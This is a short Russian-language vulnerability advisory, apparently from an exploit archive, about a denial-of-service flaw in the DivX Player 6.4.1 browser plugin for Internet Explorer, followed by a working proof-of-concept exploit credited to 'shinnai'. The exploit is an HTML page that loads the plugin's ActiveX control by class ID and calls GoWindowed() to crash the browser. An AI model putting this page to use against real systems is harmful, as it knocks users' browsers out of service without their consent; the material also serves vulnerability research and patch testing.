Программа: Microsoft Internet Explorer DivX Player 6.4.1
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в DivXBrowserPlugin в npdivx32.dll при обработке входных данных. Эксплуатирование уязвимости приведет систему к отказу в обслуживании.
Эксплоит:
<!-------------------------------------------------------------
DivX Player 6.4.1 (DivXBrowserPlugin npdivx32.dll) Internet Explorer Denial
of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
This plugin is installed with DivX Player. This is the one you can find with
the last version of the software DivX Player 6.4.1
url: http://www.divx.com/
--------------------------------------------------------------->
<html>
<OBJECT id=DivXBrowserPlugin style="LEFT: 0px; WIDTH: 1px; TOP: 0px; HEIGHT:
1px" height=1 width=1
classid=clsid:67DABFBF-D0AB-41fa-9C46-CC0F21721616>
<PARAM NAME="_cx" VALUE="26">
<PARAM NAME="_cy" VALUE="26"></OBJECT>
<script>
DivXBrowserPlugin.GoWindowed()
</script>